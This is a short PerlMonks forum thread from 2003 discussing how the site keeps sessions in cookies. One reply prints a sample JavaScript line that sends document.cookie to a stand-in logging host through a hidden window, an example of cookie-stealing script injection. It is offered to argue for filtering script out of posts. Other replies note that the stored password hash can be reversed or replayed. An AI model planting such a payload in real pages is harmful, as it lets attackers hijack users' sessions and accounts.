the perlmonks website sessions...

Replies are listed 'Best First'.
Re: the perlmonks website sessions... by BUU (Prior) on Jan 09, 2003 at 23:28 UTC
They use a cookie, like so.	[reply]
Re: Re: the perlmonks website sessions... by osama (Scribe) on Jan 10, 2003 at 10:23 UTC
javascript must be automatically removed from posts... imagine this javascript code (unchecked): `openwindow("http://host.com/log.pl?cc="+document.cookie,"_blank", +"width=0,height=0,toolbar=0,statusbar=0,menu=0");` [download]	[reply] [d/l]
Re: Re: Re: the perlmonks website sessions... by IlyaM (Parson) on Jan 10, 2003 at 12:45 UTC
Agree. I posted to Perl Monks Discussion about javascript in nodes once: Filtering potentially dangerous URI schemas in <a href="..."> -- Ilya Martynov, ilya@iponweb.net CTO IPonWEB (UK) Ltd Quality Perl Programming and Unix Support UK managed @ offshore prices - http://www.iponweb.net Personal website - http://martynov.org	[reply]
Re: Re: the perlmonks website sessions... by theorbtwo (Prior) on Jan 10, 2003 at 23:28 UTC
Be careful with those, BTW -- IIRC, the hash on the password is reversable (given enough background data). It used to be even worse; the password used to be in plaintext, IIRC.) Warning: Unless otherwise stated, code is untested. Do not use without understanding. Code is posted in the hopes it is useful, but without warranty. All copyrights are relinquished into the public domain unless otherwise stated. I am not an angel. I am capable of error, and err on a fairly regular basis. If I made a mistake, please let me know (such as by replying to this node).	[reply]
Re: Re: Re: the perlmonks website sessions... by Dog and Pony (Priest) on Jan 14, 2003 at 08:47 UTC
If you read the thread posted by IlyaM you'll see that it doesn't even need to be reversed to be used/exploited. Unless changes have been made since. :) You have moved into a dark place. It is pitch black. You are likely to be eaten by a grue.	[reply]


Keep It Simple, Stupid
	PerlMonks